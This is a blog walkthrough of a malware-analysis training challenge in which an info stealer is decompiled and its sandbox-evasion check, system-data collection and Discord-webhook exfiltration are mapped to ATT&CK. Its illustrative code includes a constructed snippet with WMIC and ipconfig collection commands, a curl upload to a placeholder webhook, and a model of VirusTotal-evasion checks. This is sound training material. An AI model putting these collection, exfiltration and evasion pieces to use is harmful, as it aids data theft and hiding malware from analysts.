LetsDefend — DLL Stealer Challenge Walkthrough

Analyzing DLL Stealer Malware with dotPeek and MITRE ATT&CK

Drew Arpino
8 min read · Jul 14, 2024
Image Credit: https://app.letsdefend.io/challenge/dll-stealer

Introduction:

Have you ever wanted to try to reverse engineer an info stealer malware sample, see how it works, and determine how it could impact its victim? If this sounds interesting to you, you’ve stumbled on the right blog! Stick around for my weekly walkthrough where we’re going to take on the DLL Stealer challenge from LetsDefend!

DLL Stealer is an introductory malware reverse engineering challenge that has us using JetBrains dotPeek to decompile and analyze an information stealer malware sample. By analyzing the malware, we’re going to determine its capabilities, what data it tries to steal, and how it exfiltrates the information — fun stuff!

To set the stage, malware reverse engineering is not my strongest skill, but practice makes perfect, so we will stumble through this one together and build up our knowledge along the way. That being said, I won’t have as many real-world application tips this time around so instead I’m providing plenty of reference links to MITRE ATT&CK to add some additional context about the tactics, techniques, and procedures (TTPs) used by the malware.

Now let’s put on our detective hats and have some fun with forensics. Thanks for reading along!

Challenge Link: https://app.letsdefend.io/challenge/dll-stealer

Challenge Scenario:

You work as a cybersecurity analyst for a major corporation. Recently, your company’s security team detected some suspicious activity on the network. It appears that a new DLL Stealer malware has infiltrated your system, and it’s causing concern due to its ability to exfiltrate critical DLL files from your system.

Question 1: What is the DLL that has the stealer code?

Let’s jump right in and connect to the provided virtual machine and extract the challenge file archive within the ChallengeFile folder.

Typically, it’s a good idea to get familiar with the provided tools so that we have some idea of what’s available to tackle the challenge. Let’s review the Tools folder on the Desktop. Right away, we’ll see several available disassemblers, debuggers, and decompilers which will be helpful to dig into the provided malware sample.

Overview of the Tools folder.

However, since reverse engineering is not my strong suit, we’ll look at the question hint as a jumping-off point:

Awesome! This will be my first time using dotPeek. Let’s take a moment to check out the project’s website to understand what it is and take a quick look at the documentation available.

dotPeek is a free .NET decompiler and assembly browser. The main idea behind dotPeek is to make high-quality decompiling available to everyone in the .NET community, free of charge.

Cool, now that we have done a little research, let’s jump into dotPeek and start the investigation. Open the ChallengeFile folder, right-click the extracted sample, and select “Open With > JetBrains dotPeek.”

This will launch dotPeek and load the file. Don’t worry if it takes a few minutes to populate the Assembly Explorer; when it does, expand the node named after the sample so that we can see the two DLL files contained within the executable:

1. Colorful

2. Test-Anitnazim.

Since we need to find the name of the specific DLL that contains the info stealer code, we’ll just start at the top of the list and expand the Colorful node so that we can peek into its classes and methods. We’ll see a few different methods that we need to look through to see if we can discover any malicious code.

After a brief scan of the code, we’ll see evidence of suspicious data staging (T1074.001) and collection (T1005) activity targeting common directories of interest for info stealers like web browser databases, cryptocurrency wallet addresses, online gaming platforms, social media accounts, etc.

Sus.

Scrolling even further to the end of the code, we even see some evidence of data exfiltration (T1048) with the curl command to send the data.

We’ll stop here for now. This is enough evidence to determine that we discovered the DLL that contains the stealer code. Let’s submit our findings to answer Question 1.

Question 2: What is the anti-analysis method used by the malware?

Sometimes, malware performs checks to see if it is being executed in a virtual or sandbox environment and will adjust its behavior or terminate to avoid detection by analysts. Question 2 suggests that there is some anti-analysis mechanism in our sample, so let’s see if we can find it!

We’ll go back into the Assembly Explorer in dotPeek, check out the IsVirusTotal(): bool method under the Colorful node, and examine the code.

Let’s focus on these interesting lines of code:

It seems that the program tries to detect whether it is being analyzed by VirusTotal through a series of system checks for values typically seen on the VirusTotal analysis engines during automated scanning, including the username, the machine name, and the location the sample was downloaded to.

The method returns a Boolean: if it returns true, the program has determined that it is being analyzed by VirusTotal and exits to evade further analysis. If it returns false, execution continues into the stealer logic.

This is an example of the defense evasion technique mentioned at the start of this question (T1497.001) where, according to MITRE ATT&CK:

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

All of that said, since the program seems to check if it is being analyzed by VirusTotal, I think we’ve found the anti-analysis method we are looking for to answer Question 2!
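To make the structure of that check concrete, here is an added example (mine, not code from the challenge sample) that models an IsVirusTotal()-style gate: each host property is compared case-insensitively against a list of artifact strings, and the first hit is returned so the analyst knows exactly which artifact would make the sample bail out. The indicator lists, the HostProfile type and the function names are assumptions for illustration; the real sample’s values are not reproduced here.

```python
"""Model of a VirusTotal/sandbox check (added example, not the sample's code)."""
from __future__ import annotations

import getpass
import os
import platform
import sys
from dataclasses import dataclass
from typing import Optional

# Constructed indicator lists for this example; the real sample's values are
# not reproduced here.
USERNAME_INDICATORS = ("sandbox", "virus", "malware", "sample")
MACHINE_INDICATORS = ("sandbox", "virustotal", "vt-scan", "analysis")
PATH_INDICATORS = ("\\sample\\", "\\virus\\", "\\analysis\\", "/tmp/sample")


@dataclass(frozen=True)
class HostProfile:
    """The three properties the walkthrough says the check looks at."""
    username: str
    machine_name: str
    executable_path: str


def matching_indicator(profile: HostProfile) -> Optional[str]:
    """Return a description of the first indicator that fires, or None.

    Returning the *reason* rather than just a bool is what an analyst wants:
    it tells you which artifact to rename (user, hostname or folder) so the
    sample runs to completion in your own lab.
    """
    checks = (
        ("username", profile.username, USERNAME_INDICATORS),
        ("machine_name", profile.machine_name, MACHINE_INDICATORS),
        ("executable_path", profile.executable_path, PATH_INDICATORS),
    )
    for label, value, indicators in checks:
        lowered = value.lower()
        for needle in indicators:
            if needle in lowered:
                return f"{label}={value!r} contains {needle!r}"
    return None


def is_virus_total(profile: HostProfile) -> bool:
    """The Boolean the malware branches on: True means 'exit, do not steal'."""
    return matching_indicator(profile) is not None


def current_host() -> HostProfile:
    """Collect the same three properties from the machine running this script."""
    return HostProfile(
        username=getpass.getuser(),
        machine_name=platform.node(),
        executable_path=os.path.abspath(sys.argv[0]),
    )


if __name__ == "__main__":
    # Constructed profiles: one that looks like an analysis box, one that does not,
    # plus whatever machine this script is actually running on.
    profiles = (
        HostProfile("sandbox", "DESKTOP-1234", "C:\\Users\\sandbox\\sample\\a.exe"),
        HostProfile("alice", "ALICE-PC", "C:\\Users\\alice\\Downloads\\setup.exe"),
        current_host(),
    )
    for host in profiles:
        reason = matching_indicator(host)
        verdict = f"exit (analysis suspected): {reason}" if reason else "continue"
        print(host, "->", verdict)
```

Running it prints a verdict for two constructed profiles and for the current machine; if your own analysis VM trips one of the checks, the printed reason says which property to change before detonating a sample that uses this kind of gate.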

Question 3: What is the full command used to gather information from the system into the “productkey.txt” file?

Now, let’s search the code and see if we can analyze some specific capabilities of the stealer functions. We are going to search for the command that the malware uses to enumerate and collect the victim’s Windows product key.

Fortunately, this is pretty straightforward, and we can simply use the find feature (CTRL+F) in dotPeek to search for the keyword “productkey.txt.”

Taking a closer look at the command, this is using the Windows Management Instrumentation Command Line (WMIC) to query the software licensing class for the value containing the Windows product key.

Question 4: What is the full command used to gather information through the “ips.txt” file?

We’ll approach Question 4 the same way we approached the previous question except this time, we will search for “ips.txt.” This will help us locate the output file so that we can see the preceding command.

Once we locate the “ips.txt” string, the preceding command shows that the IP addresses are enumerated with ipconfig /all (T1016).

Question 5: What is the webhook used by the malware?

Okay, last question! Remember back in Question 1 that we found some evidence of data being staged for exfiltration? Let’s revisit those lines of code. To speed this process up, let’s leverage dotPeek’s find function again and search for “webhook” to take us to the right location.

This will show us the correct webhook URL to answer Question 5! But, let’s take a moment to understand how this works by referencing MITRE ATT&CK for more context of this technique (T1567.004).

Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.[1] Many public and commercial services, such as Discord, Slack, and webhook.site, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.

To summarize this in the context of this info stealer, after the malware collects the data, it is exfiltrated using curl to send data to the attacker’s Discord server by leveraging Discord’s webhook functionality.
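The three searches above (the command feeding “productkey.txt”, the command feeding “ips.txt”, and the webhook URL) are the same pattern: find the interesting string literals in the decompiled C#, then read the command or constant around them. The following added example (my own triage helper, not code from the sample or from LetsDefend) automates that over decompiled source text. The C# snippet it scans is constructed for illustration and is not the challenge binary’s code; the ATT&CK mapping in TECHNIQUE_BY_TOOL is my own judgement.

```python
"""String triage over decompiled .NET stealer source (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed stand-in for decompiled output. It mimics the shape of what you
# read in dotPeek (commands launched via cmd.exe /c, output redirected into
# staging files, a webhook held in a separate constant); it is not the sample.
SAMPLE_DECOMPILED = r'''
// Constructed stand-in for decompiled output; not the real sample.
string dir = Path.Combine(Path.GetTempPath(), "stage");
Process.Start("cmd.exe", "/c wmic path SoftwareLicensingService get OA3xOriginalProductKey > " + dir + "\\productkey.txt");
Process.Start("cmd.exe", "/c ipconfig /all > " + dir + "\\ips.txt");
string hook = "https://discord.com/api/webhooks/000000000000000000/EXAMPLE_TOKEN_xyz";
Process.Start("cmd.exe", "/c curl -F \"file=@" + archive + "\" " + hook);
'''

# ATT&CK mapping used by this example (analyst's judgement, not from the sample).
TECHNIQUE_BY_TOOL = {
    "wmic": "T1047",        # Windows Management Instrumentation
    "ipconfig": "T1016",    # System Network Configuration Discovery
    "curl": "T1567.004",    # Exfiltration Over Web Service: Webhook
}

STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
WEBHOOK = re.compile(
    r'https://(?:discord|discordapp)\.com/api/webhooks/(\d+)/([A-Za-z0-9_.-]+)'
)
STAGED_FILE = re.compile(r'([A-Za-z0-9_-]+\.(?:txt|zip|db|log))\b')


@dataclass
class Command:
    tool: str                      # first token of the command line
    command_line: str              # everything after "cmd.exe /c"
    staged_file: Optional[str]     # local file the output is redirected into
    technique: Optional[str]       # ATT&CK ID from TECHNIQUE_BY_TOOL, if known


def _unescape(literal: str) -> str:
    """Undo the two C# escapes that matter for command lines."""
    return literal.replace('\\"', '"').replace('\\\\', '\\')


def extract_commands(source: str) -> list[Command]:
    """Pull every Process.Start(...) command line out of decompiled text.

    String literals on the line are joined so that a command split across
    concatenations ("... > " + dir + "\\ips.txt") still yields its staging file.
    """
    found: list[Command] = []
    for line in source.splitlines():
        if "Process.Start" not in line:
            continue
        joined = " ".join(_unescape(s) for s in STRING_LITERAL.findall(line))
        match = re.search(r'/c\s+(.*)', joined)
        if not match:
            continue
        command_line = match.group(1).strip()
        tool = command_line.split()[0].lower()
        staged = STAGED_FILE.search(command_line)
        found.append(Command(
            tool=tool,
            command_line=command_line,
            staged_file=staged.group(1) if staged else None,
            technique=TECHNIQUE_BY_TOOL.get(tool),
        ))
    return found


def extract_webhooks(source: str) -> list[tuple[str, str]]:
    """Return (webhook_id, token) pairs found anywhere in the source.

    Scanned over the whole text, not per line, because the URL usually lives
    in a constant far from the curl call that uses it.
    """
    return [(wid, token) for wid, token in WEBHOOK.findall(source)]


def redact_webhook(webhook_id: str, token: str) -> str:
    """The token is a credential: keep the ID for reporting, truncate the token."""
    return f"{webhook_id}/{token[:4]}..."


if __name__ == "__main__":
    for cmd in extract_commands(SAMPLE_DECOMPILED):
        print(f"[{cmd.technique or 'n/a'}] {cmd.tool}: {cmd.command_line}"
              f" -> {cmd.staged_file or 'no staging file'}")
    for wid, token in extract_webhooks(SAMPLE_DECOMPILED):
        print("webhook:", redact_webhook(wid, token))
```

In practice you would paste dotPeek’s exported source in place of SAMPLE_DECOMPILED. The webhook ID is enough to identify the endpoint in a report; treat the token as a secret, since anyone holding the full URL can post to (or tamper with) that webhook.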

Now that we have determined the webhook URL, let’s submit the answer and wrap up this investigation!

Conclusion:

There we have it! We have finished our analysis of the DLL Stealer malware, uncovered its functionality, anti-analysis method, targeted data, and the exfiltration method. It’s time for the postmortem report and to close out this walkthrough of the DLL Stealer challenge!

A big thank you to LetsDefend for this awesome challenge! This lab was a fun opportunity to level-up my reverse engineering skills and introduce me to the dotPeek tool. I appreciate that this challenge was on the shorter side but got me really interested in analyzing and interpreting the malware sample. By referencing MITRE ATT&CK throughout this walkthrough I was able to really dive in, engage with, and understand the challenge beyond the required questions. I hope that you found it valuable and had as much fun as I did learning something new, too!

And hey, if you found this walkthrough helpful in leveling up your skills or getting you through a tricky question, please give it a clap! Your feedback lets me know that I helped you out on your security journey. We’re in this together! Thanks for the support!

Until next week — stay curious.

Tools & References:

JetBrains dotPeek: https://www.jetbrains.com/help/decompiler/dotPeek_Introduction.html

MITRE ATT&CK (T1074.001 — Data Staged: Local Data Staging): https://attack.mitre.org/techniques/T1074/001/

MITRE ATT&CK (T1005 — Data from Local System): https://attack.mitre.org/techniques/T1005/

MITRE ATT&CK (T1048 — Exfiltration Over Alternative Protocol): https://attack.mitre.org/techniques/T1048/

curl: https://curl.se/docs/manpage.html

VirusTotal: https://www.virustotal.com/

Wikipedia — Boolean Definition: https://en.wikipedia.org/wiki/Boolean_data_type

MITRE ATT&CK (T1497.001 — Virtualization/Sandbox Evasions: System Checks): https://attack.mitre.org/techniques/T1497/001/

MITRE ATT&CK (T1016 — System Network Configuration Discovery): https://attack.mitre.org/techniques/T1016/

MITRE ATT&CK (T1567.004 Exfiltration Over Web Service: Exfiltration Over Webhook): https://attack.mitre.org/techniques/T1567/004/
